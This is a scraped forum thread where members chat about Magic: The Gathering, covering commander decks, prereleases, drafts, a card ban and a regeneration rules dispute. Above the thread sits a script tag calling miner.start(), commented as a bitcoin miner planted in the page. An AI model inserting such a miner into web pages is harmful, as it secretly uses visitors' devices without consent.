<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxysmbx community

magic the gathering

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
User avatar
Argumentable
the biggest shit
Posts: 533
Joined: 10 years ago
Location: Under the bed
Contact:

Re: magic the gathering

Postby Argumentable » 3 years ago

Yeah, for the most part I've been playing casually at work. Really would love to do highlander but some guys dont have enough cards for that. Its also tempting to make a standard/modern deck just in case I end up at the card store again but eh. "Whatever" works for me cause whatever is all I have

User avatar
Xalnop
15 Peices
Posts: 113
Joined: 9 years ago
Location: Time and Space

Re: magic the gathering

Postby Xalnop » 3 years ago

A new set of commander decks were just released, so for 35 bucks you can pick up a very decent edh deck. And once you have one it's very easy to modify by switching some cards in and out.
Image
Image
Image

User avatar
Argumentable
the biggest shit
Posts: 533
Joined: 10 years ago
Location: Under the bed
Contact:

Re: magic the gathering

Postby Argumentable » 3 years ago

I found one for cheaper, so I picked it up. Worst case it'll sit in the box forever, but I don't especially mind. We'll have to see how the work league wants to roll with commander. Rumor has it that they're gonna cut back hours (well, not technically, but only have one shift) so it'd be super easy for a bunch of us to just hang out and play once a week or something. I think that's the current plan, but we have to hear about the hours thing first

Also really tempted to try and sell off some of my old stock. I do have a few money cards (Natural Order probably being the top one and it's not in great condition), but it's moreso the junk and dollar commons/uncommons I'd like to trash. Nothing that I MIGHT use, like Rancor or whatever, but yeah. Not sure how I want to go about it either

User avatar
SAJewers
hi
Posts: 3057
Joined: 7 years ago
Location: Nova Scotia

Re: magic the gathering

Postby SAJewers » 3 years ago

I'll just leave these here:






ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Leeroh Zenon
Zetta Slow!
Posts: 10
Joined: 5 years ago
Location: Hekseville

Re: magic the gathering

Postby Leeroh Zenon » 3 years ago

Anybody here heard of Cockatrice? It's an mtg simulator, almost similar to Pokemon Showdown, except that it doesn't automate anything. It's great for playing Vintage online with people :3
3DS FC: 2921-9082-9539

User avatar
sedron
im proud of you kid
Posts: 325
Joined: 6 years ago

Re: magic the gathering

Postby sedron » 3 years ago

Leeroh Zenon wrote:Anybody here heard of Cockatrice? It's an mtg simulator, almost similar to Pokemon Showdown, except that it doesn't automate anything. It's great for playing Vintage online with people :3
I haven't really tried online simulators yet. I have Online downloaded but haven't had the desire to really try it out. I'm lucky enough to have enough chances to play paper Magic where I haven't wanted a simulator.

Speaking of, prerelease for Oath of the Gatewatch is this weekend. Anyone planning on attending one? I'm hoping to do midnight and our local store's Sunday 2HG.
Image
Image
Image

User avatar
Argumentable
the biggest shit
Posts: 533
Joined: 10 years ago
Location: Under the bed
Contact:

Re: magic the gathering

Postby Argumentable » 3 years ago

I want to make a new EDH deck for Friday but idk if I should do a janky Melek burn deck or if I should go Nekusar that only has like half the cards I need for it. EDH is fun ok

User avatar
sedron
im proud of you kid
Posts: 325
Joined: 6 years ago

Re: magic the gathering

Postby sedron » 3 years ago

Argumentable wrote:I want to make a new EDH deck for Friday but idk if I should do a janky Melek burn deck or if I should go Nekusar that only has like half the cards I need for it. EDH is fun ok
Is this for Duel Commander or a larger group of people?

I run Melek in the 99 of my Keranos deck, but he's a suitable commander. He just tends to draw removal kind of quickly.

Nekusar has the same problems. I have a Nekusar deck, but it's actually built as Zombie tribal instead of the traditional "everyone draws cards until they die," deal. You can find a lot of Nekusar cards for cheap though, especially if you have a lot of them already. He just kind of works with everything. A good example would be Embermaw Hellion. It might not be obvious at first glance, but it doubles the damage Nekusar is dealing. It's a nice budget option for sure.
Image
Image
Image

User avatar
Leeroh Zenon
Zetta Slow!
Posts: 10
Joined: 5 years ago
Location: Hekseville

Re: magic the gathering

Postby Leeroh Zenon » 3 years ago

sedron wrote: Speaking of, prerelease for Oath of the Gatewatch is this weekend. Anyone planning on attending one? I'm hoping to do midnight and our local store's Sunday 2HG.
I'm probably going to go to one, though I hope playing Gatewatch sealed is somewhat easier than BfZ. I completely failed at my last BfZ draft, so hopefully this one will go somewhat better.
3DS FC: 2921-9082-9539

User avatar
sedron
im proud of you kid
Posts: 325
Joined: 6 years ago

Re: magic the gathering

Postby sedron » 3 years ago

Leeroh Zenon wrote:
sedron wrote: Speaking of, prerelease for Oath of the Gatewatch is this weekend. Anyone planning on attending one? I'm hoping to do midnight and our local store's Sunday 2HG.
I'm probably going to go to one, though I hope playing Gatewatch sealed is somewhat easier than BfZ. I completely failed at my last BfZ draft, so hopefully this one will go somewhat better.
I generally find Sealed easier than Draft, and that was definitely the case for BfZ. I did two prereleases for BfZ and went 4-0 and both, but I found drafting much harder. Part of this is because the prereleases attract more (and less experienced people,) whereas FNM at my local store is mainly comprised of a large group of very strong players (I've been pitted against people that play in PT's and such before.) Beyond that, though, BfZ is a very synergy-based set. You can't just get good cards, you need cards that work well together, and it's pretty easy to end up with a subpar card pool because of that.

Gatewatch will likely be more of the same, so focus on getting good synergies going and you'll do a lot better. Also, it's worth noting that Blue Black and Red are a LOT stronger than White and Green in BfZ, and that appears to continue into Oath. That doesn't mean a good WR Ally deck or RG Landfall deck is impossible, but you're likely going to end up with a UR Devoid deck or something like that instead.
Image
Image
Image

User avatar
Leeroh Zenon
Zetta Slow!
Posts: 10
Joined: 5 years ago
Location: Hekseville

Re: magic the gathering

Postby Leeroh Zenon » 3 years ago

sedron wrote: UR Devoid deck
Actually, that was exactly what I had at my last BfZ draft, except that I had not nearly enough good red for it to work. That draft was somewhat unpleasant, because it was full of children with no concept of inside voices in an echoy room.
3DS FC: 2921-9082-9539

User avatar
sedron
im proud of you kid
Posts: 325
Joined: 6 years ago

Re: magic the gathering

Postby sedron » 3 years ago

Leeroh Zenon wrote:
sedron wrote: UR Devoid deck
Actually, that was exactly what I had at my last BfZ draft, except that I had not nearly enough good red for it to work. That draft was somewhat unpleasant, because it was full of children with no concept of inside voices in an echoy room.
We kind of have the other extreme here. Lots of older dudes that don't necessarily shower ever. Though a lot of our players are really nice and good at bathing too.
Image
Image
Image

User avatar
Mata Hari
Posts: 2200
Joined: 9 years ago

Re: magic the gathering

Postby Mata Hari » 3 years ago

I have a problem at my local FNM insofar as I'm too old for the entry-level tournament but don't have enough of a deck for the advanced tournament.

Like last time I went I came up against a sub-10-year-old who had a deck containing >100 cards. It's like bruh. Bruh

I mean my other two matches were against people who were old enough to have decent decks and know what they're doing, but still. The deck quality in the entry-level tournament is so wildly inconsistent it just doesn't feel worthwhile sometimes. Sometimes you absolutely destroy somebody running a pile before getting destroyed by somebody running something really fucking lame like a land-destruction Living End combo deck. Fuck that guy.

User avatar
Leeroh Zenon
Zetta Slow!
Posts: 10
Joined: 5 years ago
Location: Hekseville

Re: magic the gathering

Postby Leeroh Zenon » 3 years ago

sedron wrote:
Leeroh Zenon wrote:
sedron wrote: UR Devoid deck
Actually, that was exactly what I had at my last BfZ draft, except that I had not nearly enough good red for it to work. That draft was somewhat unpleasant, because it was full of children with no concept of inside voices in an echoy room.
We kind of have the other extreme here. Lots of older dudes that don't necessarily shower ever. Though a lot of our players are really nice and good at bathing too.
I have two places that I go to draft, with both ends of the mtg player age spectrum, though the old chubby dudes seem to have a decent facade of hygiene. Though one of the places has what has got to be the worst player type: the obnoxious spiky teenagers who are way too intense about pre-releases and winning prizes for their own good. I feel bad for them, sometimes.
3DS FC: 2921-9082-9539

User avatar
sedron
im proud of you kid
Posts: 325
Joined: 6 years ago

Re: magic the gathering

Postby sedron » 3 years ago

dr_kraid wrote:I have a problem at my local FNM insofar as I'm too old for the entry-level tournament but don't have enough of a deck for the advanced tournament.

Like last time I went I came up against a sub-10-year-old who had a deck containing >100 cards. It's like bruh. Bruh

I mean my other two matches were against people who were old enough to have decent decks and know what they're doing, but still. The deck quality in the entry-level tournament is so wildly inconsistent it just doesn't feel worthwhile sometimes. Sometimes you absolutely destroy somebody running a pile before getting destroyed by somebody running something really fucking lame like a land-destruction Living End combo deck. Fuck that guy.
That's part of why I like playing Limited formats. It's much less of a buy-your-way-to-victory deal, and you don't have to play against really unfun decks.

Is your FNM just Modern? I assume that's where you'd see a Living End deck, though they're not usually more into land destruction than other decks (Fulminator Mage still gets played everywhere it can though.) What deck do you run?
Leeroh Zenon wrote: I have two places that I go to draft, with both ends of the mtg player age spectrum, though the old chubby dudes seem to have a decent facade of hygiene. Though one of the places has what has got to be the worst player type: the obnoxious spiky teenagers who are way too intense about pre-releases and winning prizes for their own good. I feel bad for them, sometimes.
We have a couple of people that get upset about losing, but mostly good sports. My last match in the second BfZ prerelease was against a dude who assumed I'd just split prizes instead of doing the last match, and he was not happy when I won. Like, at all. =P

I also had a first round in draft that ended in my opponent throwing his deck after getting mana screwed a bunch.
Image
Image
Image

User avatar
Argumentable
the biggest shit
Posts: 533
Joined: 10 years ago
Location: Under the bed
Contact:

Re: magic the gathering

Postby Argumentable » 3 years ago

sedron wrote:
Argumentable wrote:I want to make a new EDH deck for Friday but idk if I should do a janky Melek burn deck or if I should go Nekusar that only has like half the cards I need for it. EDH is fun ok
Is this for Duel Commander or a larger group of people?

I run Melek in the 99 of my Keranos deck, but he's a suitable commander. He just tends to draw removal kind of quickly.

Nekusar has the same problems. I have a Nekusar deck, but it's actually built as Zombie tribal instead of the traditional "everyone draws cards until they die," deal. You can find a lot of Nekusar cards for cheap though, especially if you have a lot of them already. He just kind of works with everything. A good example would be Embermaw Hellion. It might not be obvious at first glance, but it doubles the damage Nekusar is dealing. It's a nice budget option for sure.
It's a casual match with the people from work. I don't have a lot to work with, but I bought a bunch of singles one day to earn store credit! It's either run the basic 2015 commander izzet deck again, rework it into melek with some fun cards, there's Zada, Hedron Grinder which wouldn't be too overpowered cause of my pool and also I lost the card somewhere in my box of cards it was in my black deck for some reason. Then there's Nekusar. Or a monoblack deck with Drana that was a cheap thing I was trying to copy online. I feel like Nekusar is my best bet because it's like 1/6th of a deck of everything else, and then with nekusar I'm up to 1/3rd and can just add some filler, haha

Our meta seems to be "everyone is a black deck" but I don't want to specifically hose that... but I could!

User avatar
sedron
im proud of you kid
Posts: 325
Joined: 6 years ago

Re: magic the gathering

Postby sedron » 3 years ago

Midnight Prerelease went pretty poorly. =/

That was probably the worst pool of cards I've ever seen. I had one good rare that took a LOT of work to use (Crush of Tentacles,) and everything else was varying degrees of "meh," to "unplayable." Ended up in Blue/Black, though maybe Green could have replaced one of them (likely Black?)

One my first match, lost against the second guy though (a judge I've played against before, he's pretty good so I'm not totally surprised especially considering the pool of cards I have.) Decided to drop from the tournament so I could get some sleep and get to work on time. I could have tried winning my next two matches to walk home with twelve dollars but I could also just work and guarantee the money so yeah. =P

Also Splinter Twin got banned from Modern, which is kind of ridiculous. This also killed my friend's deck, which he's been putting a lot of time and money into, so he's pretty upset about that.

Life is hard. =P
Image
Image
Image

User avatar
SAJewers
hi
Posts: 3057
Joined: 7 years ago
Location: Nova Scotia

Re: magic the gathering

Postby SAJewers » 3 years ago

If you haven't seen the latest Episode of Friday Nights, go watch it.


ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
LovelyPenguin
Penguinpenguinpen
Posts: 76
Joined: 5 years ago
First name: \(0v0)/
Pronouns: any are fine
Location: Chai Kingdom (returning)
Contact:

Re: magic the gathering

Postby LovelyPenguin » 3 years ago

I loooooove Commander. That is seriously my favorite format. 100 card singleton forces you to be creative with your deck design, while having a commander you'll always have access to gives you something to build around. I actually have 30 decks, and I don't plan on stopping! >:D
"The penguin is the core of the universe; the penguin is all."
- raocow

Image

Avatar by Wheat

User avatar
SAJewers
hi
Posts: 3057
Joined: 7 years ago
Location: Nova Scotia

Re: magic the gathering

Postby SAJewers » 3 years ago

The Monthly MTGO Streamer showdown is happening right now: http://www.twitch.tv/loadingreadyrun http://www.twitch.tv/directory/game/Mag ... 0Gathering
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Argumentable
the biggest shit
Posts: 533
Joined: 10 years ago
Location: Under the bed
Contact:

Re: magic the gathering

Postby Argumentable » 3 years ago

The guys at work always wanna open a booster box and this time I got Ayli. I didn't even finish my Zada deck!

Also for our "sealed tournament" I always end up golgari

Ok that's my magic update

User avatar
Xalnop
15 Peices
Posts: 113
Joined: 9 years ago
Location: Time and Space

Re: magic the gathering

Postby Xalnop » 3 years ago

I opened the wasteland expedition out of my booster box.
Image
Image
Image

User avatar
SAJewers
hi
Posts: 3057
Joined: 7 years ago
Location: Nova Scotia

Re: magic the gathering

Postby SAJewers » 3 years ago

If any magic fans here are free tonight, the guys over at LoadingReadyRun are drafting with Alara Block foil boosters at 6 PM Pacific/9 PM Eastern.

twitch.tv/loadingreadyrun
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Argumentable
the biggest shit
Posts: 533
Joined: 10 years ago
Location: Under the bed
Contact:

Re: magic the gathering

Postby Argumentable » 3 years ago

TRIP REPORT

I actually made it to FNM. I was worried about there being a lot of people there AND THERE WERE except also not really. Most people were playing other things and we did a draft with 9 people. I went like 1 and 2 with a shitty flying deck and the last game there was a dispute about regeneration (I said if a creature actually regenerates it taps, they said it didn't, but it didn't matter in the long run [except it possibly could have]) but everyone was really nice and they told me and the friend I went with to come back. So we will probably do that cause I legit had a good time and wasn't actually thinking "fuuuuck how do I leave this social situation without it being awkward" until it was near midnight when this one guy was telling us about every single game in the store and some that weren't (he was cool though)

My shitty green/blue flier deck (I was trying to move into black after I got passed tons of removal but it didn't work) was fun though!

User avatar
Xalnop
15 Peices
Posts: 113
Joined: 9 years ago
Location: Time and Space

Re: magic the gathering

Postby Xalnop » 3 years ago

Ah... the ol regeneration argument.

The Regeneration ability creates a replacement effect that protects the permanent the next time it is going to be destroyed. "Regenerate (permanent)" means "The next time (permanent) would be destroyed this turn, instead remove all damage marked on it and tap it. If it's an attacking or blocking creature, remove it from combat."

Argumentable should have won his argument.

However... regeneration shields don't cause the permanent to tap, it only taps if the regeneration took effect.
Image
Image
Image


Return to “the cartridgé”

Who is online

Users browsing this forum: Google [Bot] and 2 guests